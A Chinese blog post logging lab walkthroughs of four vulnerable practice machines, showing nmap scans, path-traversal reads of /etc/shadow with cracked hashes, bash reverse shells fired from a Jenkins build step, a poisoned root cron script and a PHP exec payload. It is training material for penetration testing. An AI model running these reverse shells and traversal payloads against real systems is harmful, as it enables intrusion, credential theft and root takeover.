红队笔记--W1R3S、JARBAS、SickOS、Prime打靶练习记录

news2024/11/26 10:35:32

W1R3S(思路为主)

信息收集
首先使用nmap探测主机,得到192.168.190.147

接下来扫描端口,可以看到ports文件保存了三种格式

其中.nmap和屏幕输出的一样;xml这种的适合机器

nmap -sT --min-rate 10000 -p- 192.168.190.147 -oA nmapscan/ports

在这里插入图片描述

使用grep命令搜索有端口的数据行。

grep open nmapscan/ports.nmap

grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' #打印第一列

grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',' #合并到行,用,分割 

在这里插入图片描述

21端口是ftp文件传输协议的端口,可能存在匿名登录
22端口是ssh远程登录端口
80端口是web页面端口
3306是mysql数据库端口

将这些端口作为变量赋值给ports

ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',') 

echo ports可以看到回显正常

接着详细信息扫描(分析重点)

nmap -sT -sV -sC -O -p21,22,80,3306 192.168.190.147 -oA nmapscan/detail

然后扫描UDP

nmap -sU --top-ports 20 192.168.190.147 -oA nmapscan/udp    #扫描常见的20个端口

然后nmap的默认脚本扫描

nmap --script=vuln -p21,22,80,3306 192.168.190.147 -oA nmapscan/vuln

接下来尝试ftp匿名登录(21端口),然后用户名输入anonymous(匿名的意思) 密码为空

ftp 192.168.190.147 

ftp> binary #切换成二进制模式,不然下载的文件可能是坏的
ftp> ? #查看可以用的命令
ftp> prompt  #关闭交互模式

发现content目录,进入之后里面有三个txt文件:01.txt 02.txt 03.txt

mget *.txt  #一次下载这三个文件

接着切换到docs目录,下载里面的worktodo.txt文件

get worktodo.txt

然后切换到new-employees目录,下载里面的employee-names.txt文件。之后quit即可

cat这些文件
在这里插入图片描述

第一个字符串用hash-identifier检查是md5 解密之后是: This is not a password
第二个是base64 解密之后是:It is easy, but not that easy…

80端口的web页面是ubuntu的默认页面,里面也没有线索

3306的mysql端口也没有线索

接下来尝试目录爆破,使用gobuster进行爆破,字典选择kali自带的

sudo gobuster dir -u http://192.168.190.147 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

扫描wordpress/wp-login.php目录和/administrator/installation/目录

在administrator/installation/目录下暴露了是cuppa CMS ,也可以使用whatweb进行指纹识别得到

使用searchsploit搜索,并下载结果

searchsploit cuppa cms查找历史漏洞

在这里插入图片描述

查看内容,发现有任意文件读取

在这里插入图片描述

http://192.168.190.147/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在这里插入图片描述

有回显但是没有显示/etc/passwd内容,再试试下面那个moreover部分
使用curl提交post请求: 发现etc/passwd的内容

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.190.147/administrator/alerts/alertConfigField.php

接着获取/etc/shadow中的内容
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.190.147/administrator/alerts/alertConfigField.php

可以发现两个明显的用户信息,上面还有一个root账户

在这里插入图片描述

www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::

保存到shadow.hash中,使用John破解

john shadow.hash

破解了两个用户www-data和w1r3s
在这里插入图片描述

接下来尝试登录w1r3s账户,密码是computer 成功登录

ssh w1r3s@192.168.190.147
whoam
uname -a 
id
sudo -l

发现已经具有root权限,以系统权限运行/bin/bash sudo /bin/bash
然后就具有root权限了
切换到/root目录,即可得到flag
在这里插入图片描述


JARBAS-jenkins(典型CMS)

首先进行网段扫描,,得到靶机虚拟主机ip:192.168.136.132

arp-scan -l
或
nmap -sn 192.168.136.0/24
端口扫描
nmap --min-rate 10000 -p- 192.168.136.132
得到如下常规端口
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy

然后扫描得到的端口:nmap -sT -sV -O -p22,80,3306,8080 192.168.136.132
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT

尝试扫描UDP端口但是都关闭:nmap -sU -p22,80,3306,8080 192.168.136.132

接着尝试脚本扫描:nmap --script=vuln -p22,80,3306,8080 192.168.136.132
PORT     STATE  SERVICE
80/tcp   open   http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/njarb_data/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/njarb_data/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/njarb_data/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/njarb_data/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DD%27%20OR%20sqlspider
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.136.132
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.136.132:80/
|     Form id: wmtb
|     Form action: /web/submit
|     
|     Path: http://192.168.136.132:80/
|     Form id: 
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|     
|     Path: http://192.168.136.132:80/
|     Form id: 
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
222/tcp  closed rsh-spx
3306/tcp open   mysql
8080/tcp open   http-proxy
| http-enum: 
|_  /robots.txt: Robots file


80端口是一个CMS,8080端口是一个管理端登录页面,还发现一个robots.txt协议,robots.txt协议中说不希望机器人点击"build"按钮

在这里插入图片描述
在这里插入图片描述

目录爆破
dirb http://192.168.136.133
dirsearch -u http://192.168.136.133
gobuster -u http://192.168.136.133 -w /usr/share/wordlists/dirbuster/dirctory-list-1.0.txt

只扫描到index.html和access.html

index.html就是正常的80端口首页,access.html出现了下面这个,意思是凭据被安全地加密了。使用hash-identifier判断是MD5加密,使用在线工具解决

在这里插入图片描述

md5解密之后如下
tiago:italia99
trindade:marianna
eder:vipsu

前两个都无效,第三个可以登录
在这里插入图片描述

在创建任务中发现build(构建),联想到robots.txt中说不希望自动化工具在这里build
在这里插入图片描述

选择执行shell,写入bash交互/bin/bash -i >& /dev/tcp/192.168.136.131/4444 0>&1,在kali的4444端口开启监听

点击立即构建,在kali中可以看到上线

在这里插入图片描述

获取权限
whoami //回显是jenkins

uname -a //查看系统,是jarbas,为linux系统

ip -a   ifconfig    dbkg -l //都没有这些命令

sudo -l //查看系统有哪些权限,提示也是没有任何权限

cat /etc/passwd //查看有哪些用户,发现有root权限,当前用户为jenkins没有任何权限

cat /etc/crontab  //查看自动任务!!!!!

在这里插入图片描述
在这里插入图片描述

最下面这行的意思是以root权限每五分钟执行这个脚本,并丢弃的意思,cat /etc/script/CleaningScript.sh查看内容
内容是:rm -rf /var/log/httpd/access_log.txt即删除这个日志文件

尝试直接覆盖这个CleaningScript.sh文件
echo "/bin/bash -i >& /dev/tcp/192.168.136.131/4443 0>&1" >> /etc/script/CleaningScript.sh  (在此之前要再开一个窗口先监听4443端口)
正常会在后五分钟之内监听上线,实现反弹shell

在这里插入图片描述

得到root权限,接下来直接ls cat flag.txt即可


SickOS

端口扫描

虚拟机ip:192.168.136.134

nmap --min-rate 10000 -p- 192.168.136.134    #得到22,3128,8080端口
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

nmap -sT -sV -sC -O -p22,3128,8080 192.168.136.134  #详细扫描
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19
8080/tcp closed http-proxy

nmap -sU --top-ports 20 192.168.136.134   #扫描UDP端口

nmap --script=vuln -p22,3128,8080 192.168.136.134 #使用默认脚本扫描
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:08:4F:09 (VMware)

在这里插入图片描述

访问3128端口,提示报错,但是下面提示squid
搜索squid是一种代理协议

目录爆破
dirsearch -u http://192.168.136.134   #扫描不到任何东西
#接下来尝试使用代理服务器扫描
dirb http://192.168.136.134 -p http://192.168.136.134:3128
---- Scanning URL: http://192.168.136.134/ ----
+ http://192.168.136.134/cgi-bin/ (CODE:403|SIZE:291)                                                       
+ http://192.168.136.134/connect (CODE:200|SIZE:109)                                                         
+ http://192.168.136.134/index (CODE:200|SIZE:21)                                                           
+ http://192.168.136.134/index.php (CODE:200|SIZE:21)                                                       
+ http://192.168.136.134/robots (CODE:200|SIZE:45)                                                           
+ http://192.168.136.134/robots.txt (CODE:200|SIZE:45)                                                       
+ http://192.168.136.134/server-status (CODE:403|SIZE:296)

接下来需要修改浏览器代理才能访问
在这里插入图片描述

成功进入web页面

web渗透

在这里插入图片描述

无任何线索,在robots.txt页面发现/wolfcms目录,进入之后发现是一个Wolf CMS页面
在这里插入图片描述

点击文章会出现跳转,在谷歌搜索wold cms admin path 可以搜到CVE漏洞

http://192.168.136.134/wolfcms/?/admin/plugin/file_manager/browse/

进入之后会跳转到登录页面
在这里插入图片描述

直接弱口令,账户密码都是admin,即可登录
在这里插入图片描述

里面有很多文件可以修改,可以尝试写php反弹shell
在这里插入图片描述

在articles中写入一句话木马反弹shell

保存之后需要点击旁边的放大镜才会执行,此时会跳转到其他页面,kali端可以看到已经上线。

ex\ec("/bin/bash -c 'bash -i >& /dev/tcp/122.51.15.95/1234 9>&1'");
提权
uname -a  #查看系统版本信息
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

ls -laih
264349 drwxr-xr-x 5 root root 4.0K Dec  5  2015 .
264214 drwxrwxrwx 3 root root 4.0K Dec  6  2015 ..
264579 -rwxr-xr-x 1 root root  950 Dec  5  2015 .htaccess
264538 -rwxrwxrwx 1 root root 4.0K Dec  5  2015 CONTRIBUTING.md
264416 -rwxrwxrwx 1 root root 2.4K Dec  5  2015 README.md
264352 -rwxrwxrwx 1 root root  403 Dec  5  2015 composer.json
264514 -rwxrwxrwx 1 root root 3.0K Dec  5  2015 config.php
264639 drwxrwxrwx 2 root root 4.0K Dec  5  2015 docs
264537 -rwxrwxrwx 1 root root  894 Dec  5  2015 favicon.ico
264627 -rwxrwxrwx 1 root root 6.7K Dec  5  2015 index.php
264544 drwxrwxrwx 4 root root 4.0K Dec  6  2015 public
265378 -rwxrwxrwx 1 root root    0 Dec  5  2015 robots.txt
264580 drwxrwxrwx 7 root root 4.0K Dec  5  2015 wolf
发现里面有个配置文件config.php,查看内容,发现一个数据库账户
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

cat /etc/passwd    #passwd可以成功访问,但是shadow没有权限访问
#其中有/bin/bash环境的只有root和sickos
root:x:0:0:root:/root:/bin/bash     !!!!
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh    !!!!
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash   !!!!
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false


现在已知数据库密码为 john@123  再开一个窗口尝试ssh登录sickos账户
ssh sickos@192.168.136.134
密码为john@123成功登录

sudo -l #查看权限 已经具有所有权限
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sudo su 成功
flag在/root目录,直接cat 即可

Prime

目标靶机ip为:192.168.136.135

端口扫描
nmap --min-rate 10000 -p- 192.168.136.134
扫描到22和80端口

nmap -sT -sV -sC -O -p22,80 192.168.136.135 
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest

nmap --script=vuln -p22,80 192.168.136.135

目录爆破
dirsearch -u http://192.68.136.135  #发现是wp
[19:54:40] 200 -  131B  - /dev                                 
[19:54:43] 200 -  137B  - /image.php                           
[19:54:44] 301 -  323B  - /javascript->http://192.168.136.135/javascript/
[19:54:50] 403 -  303B  - /server-status                       
[19:54:50] 403 -  304B  - /server-status/
[19:54:55] 200 -    4KB - /wordpress/                         
[19:54:55] 200 -    1KB - /wordpress/wp-login.php

dev目录中回显,意思应该是要继续深挖

hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking. 

由于前面是扫描目录,不会扫描出文件,使用dirb加参数扫描.zip或.txt类型的文件

dirb http://192.168.136.135 -X .zip,.txt

START_TIME: Tue Oct 22 20:23:54 2024
URL_BASE: http://192.168.136.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.136.135/ ----
+ http://192.168.136.135/secret.txt (CODE:200|SIZE:412)      

扫描得到secret.txt文件,内容如下:要对每个php文件进行fuzz测试,如果得到参数,进行下一步。
还提示一个location.txt文件和 Fuzz工具wfuzz(kali自带)

Looks like you have got some secrets.
Ok I just want to do some help to you. 
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
 

//see the location.txt and you will get your next move//

利用网站中所给命令进行扫描

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.136.135/index.php?FUZZ=

这种为136CH的为失败情况
在这里插入图片描述

过滤一下136

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.136.135/index.php?FUZZ

扫描得到一个file
在这里插入图片描述

当访问该file文件时,又提示挖错文件了

将前面的location.txt拼接上,得到回显。意思是在其他php页面中,加上secrettier360参数。使用前面的image.php

Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.

访问http://192.168.136.135/image.php?secrettier360 提示使用了正确参数

文件包含漏洞利用

这里直接?secrettier360 =/etc/passwd 就直接读取了。或者穿越三层目录以上也可以读取到

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

其中root和victor有/bin/bash权限。而且还有个password.txtsaket:x:1001:1001:find password.txt file in my directory:/home/saket:

查看其中信息secrettier360=/home/saket/password.txt回显是follow_the_ippsec不知道是干什么的

wordpressCMS渗透

wordpress页面中也有一个victor。尝试登录后台/wordpress/wp-login.php>
账户victor 密码follow_the_ippsec 成功登录后台

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2247791.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Qt/C++基于重力模拟的像素点水平堆叠效果

本文将深入解析一个基于 Qt/C 的像素点模拟程序。程序通过 重力作用,将随机分布的像素点下落并水平堆叠,同时支持窗口动态拉伸后重新计算像素点分布。 程序功能概述 随机生成像素点:程序在初始化时随机生成一定数量的像素点,每个…

十一月二十五

双向循环链表 class Node:#显性定义出构造函数def __init__(self,data):self.data data #普通节点的数据域self.next None #保存下一个节点的链接域self.prior None #保存前一个节点饿链接域 class DoubleLinkLoop:def __init__(self, node Node):self.head nodeself.siz…

Python + 深度学习从 0 到 1(00 / 99)

希望对你有帮助呀!!💜💜 如有更好理解的思路,欢迎大家留言补充 ~ 一起加油叭 💦 欢迎关注、订阅专栏 【深度学习从 0 到 1】谢谢你的支持! ⭐ 什么是深度学习? 人工智能、机器学习与…

UG NX二次开发(C++)-UIStyler-指定平面的对象和参数获取

文章目录 1、前言2、在UG NX中创建平面和一个长方体,3、在UI Styler中创建一个UI界面4、在VS中创建一个工程4.1 创建并添加工程文件4.2 在Update_cb方法中添加选择平面的代码4.3 编译完成并测试效果1、前言 在采用NXOpen C++进行二次开发时,采用Menu/UIStyler是一种很常见的…

C# 命令行运行包

环境:net6 nuget包:Cliwrap 3.6.7 program: 相当于cmd运行命令:nuget search json static async Task Main(string[] args) {var cmd Cli.Wrap("D:\\软件\\Nuget\\nuget.exe").WithArguments(args >args.Add("…

长三角文博会:Adobe国际认证体系推动设计人才评价新标准

2024年11月22日,由上海、江苏、浙江、安徽三省一市党委宣传部共同发起的第五届长三角文化博览会(简称“长三角文博会”)在上海国家会展中心盛大启幕。长三角文博会自2018年起已成功举办多届,已成为展示区域文化产业发展成果、推动…

音视频基础扫盲之视频码率控制策略(CBR、VBR还是ABR)

视频码率控制策略 CBR(Constant Bit Rate)、VBR(Variable Bit Rate)和ABR(Average Bit Rate)是三种常见的比特率控制方式,以视频码率控制为例,视频码率控制策略主要是在保证视频质量…

【C语言】传值调用与传址调用:深度解析与实现

博客主页: [小ᶻ☡꙳ᵃⁱᵍᶜ꙳] 本文专栏: C语言 文章目录 💯前言💯什么是传值调用和传址调用?1. 传值调用(Call by Value)2. 传址调用(Call by Reference) 💯传值调…

C++《二叉搜索树》

在初阶数据结构中我学习了树基础的概念以及了解了顺序结构的二叉树——堆和链式结构二叉树该如何实现,那么接下来我们将进一步的学习二叉树,在此会先后学习到二叉搜索树、AVL树、红黑树;通过这些的学习将让我们更易于理解后面set、map、哈希等…

Leetcode647. 回文子串(HOT100)

链接 代码&#xff1a; class Solution { public:int countSubstrings(string s) {int res 0;for(int i 0;i<s.size();i){for(int j i,k i;j>0&&k<s.size();j--,k){if(s[j]!s[k])break;else res;}for(int j i,k i1;j>0&&k<s.size();j--…

ubuntu, 安装部署comfyui,记录2:下载模型GGuf及测试

0.清除工作流 1.安装manager 2024年最新ComfyUI汉化及manager插件安装详解&#xff01;_comfyui-manager-CSDN博客 ComfyUI Manager安装 转到ComfyUI的安装目录ComfyUI/custom_nodes; 使用git拉取ComfyUI Manager&#xff0c;git clone https://github.com/ltdrdata/Comf…

【Y20030006】基于php+mysql的课程学习网站的设计与实现(附源码 配置 文档)

网络购物商城的设计与实现 1.摘要2.开发目的和意义3.系统功能设计4.系统界面截图5.源码获取 1.摘要 随着互联网的普及和在线教育的兴起&#xff0c;课程学习网站已经成为越来越多人获取知识和提升技能的重要途径。在这样的背景下&#xff0c;开发一个基于Laravel框架的课程学习…

O2O: (BOORL) Bayesian Design Principles for Offline-to-Online RL

ICML 2024 paper code Intro O2O如何避免悲观学习导致sample efficiency较低&#xff0c;亦或者乐观估计导致的performance drop。本文提出贝叶斯准则&#xff0c;指导在线学习过程中的探索和利用。通过构建一个Q值相关的信念分布&#xff0c;agent可以对不同策略的优劣有一个…

Hyper-V配置-cnblog

启用Hyper-V以在 Windows 10上创建虚拟机 &#xff08;1&#xff09;控制面板检查系统要求&#xff1a; 确保您的计算机符合 Hyper-V 的系统要求。通常情况下&#xff0c;您的计算机需要运行 Windows 10 专业版、企业版或教育版&#xff0c;并且具有启用了虚拟化技术的处理器。…

基础免杀 从.rsrc加载shellcode上线

.rsrc 段是PE文件中的一个特定部分&#xff0c;专门用来存储资源数据。这些资源通常包括图标、位图、字符串表、对话框、菜单、版本信息、字体等 具体的shellcode加载方式不在此探讨 在这使用传统的指针执行 WindowsAPI 需要用到如下API FindResource 获取指定资源的信息块…

Excel把其中一张工作表导出成一个新的文件

excel导出一张工作表 一个Excel表里有多个工作表&#xff0c;怎么才能导出一个工作表&#xff0c;让其生成新的Excel文件呢&#xff1f; 第一步&#xff1a;首先打开Excel表格&#xff0c;然后选择要导出的工作表的名字&#xff0c;比如“Sheet1”&#xff0c;把鼠标放到“She…

第四期书生大模型实战营——基础岛第4关-L1G4000-InternLM + LlamaIndex RAG 实践

Tutorial 基础任务 任务要求1&#xff08;必做&#xff0c;参考readme_api.md&#xff09;&#xff1a;基于 LlamaIndex 构建自己的 RAG 知识库&#xff0c;寻找一个问题 A 在使用 LlamaIndex 之前 浦语 API 不会回答&#xff0c;借助 LlamaIndex 后 浦语 API 具备回答 A 的能…

搭建文件服务器并使用Qt实现文件上传和下载(带账号和密码)

文章目录 0 背景1 搭建文件服务器2 代码实现文件上传和下载2.1 在pro文件中添加网络支持2.2 创建网络管理类2.3 文件上传2.4 文件下载 3 扩展&#xff08;其他方法实现文件上传和下载&#xff09;3.1 python3.2 npm3.3 ftp服务器 4 完整的代码 0 背景 因为需要使程序具备在远程…

【初阶数据结构和算法】leetcode刷题之设计循环队列

文章目录 一、实现循环队列1.大致思路分析2.循环队列的结构定义和初始化结构定义初始化 3.循环队列的判空和判满判空和判满难点分析判空判满 4.循环队列的入队列和出队列入队列出队列 5.循环队列取队头和队尾元素取队头元素取队尾元素 6.循环队列的销毁7.最后题解源码 一、实现…

llama-factory 系列教程 (七),Qwen2.5-7B-Instruct 模型微调与vllm部署详细流程实战

文章目录 介绍llama-factory 安装装包下载模型 微调模型数据集训练模型 微调后的模型推理 介绍 时隔已久的 llama-factory 系列教程更新了。本篇文章是第七篇&#xff0c;之前的六篇&#xff0c;大家酌情选看即可。 因为llama-factory进行了更新&#xff0c;我前面几篇文章的实…